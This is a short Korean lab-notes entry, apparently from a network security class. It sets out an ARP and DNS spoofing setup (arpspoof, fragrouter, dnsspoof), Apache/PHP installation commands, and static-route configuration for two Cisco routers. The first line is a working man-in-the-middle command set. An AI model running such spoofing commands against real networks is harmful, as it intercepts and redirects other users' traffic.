2024년 2월 20일
arpspoof -t 1.1.1.1 1.1.1.254 fragrouter -B1 dnsspoof -i eth0 ./dnsspoof.hosts sudo apt update && sudo apt upgrade sudo reboot sudo apt -y install wget php php-cgi php-mysqli php-pear php-mbstring libapache2-mod-php php-common php-phpseclib php-mysql apt -y install php-fpm a2enmod proxy_fcgi setenvif a2enconf php8.2-fpm systemctl restart php8.2-fpm apache2 #R1 config t interface FastEthernet0/0 ip address 100.100.100.254 255.255.255.0 no shutdown exit config t interface Serial1/0 ip address 1.1.1.1 255.255.255.252 no shutdown exit ip route 220.87.199.0 255.255.255.0 1.1.1.2 exit #R2 config t interface FastEthernet0/0 ip address 220.87.199.254 255.255.255.0 no shutdown exit config t interface Serial1/0 ip address 1.1.1.2 255.255.255.252 no shutdown exit ip route 100.100.100.0 255.255.255.0 1.1.1.1 exit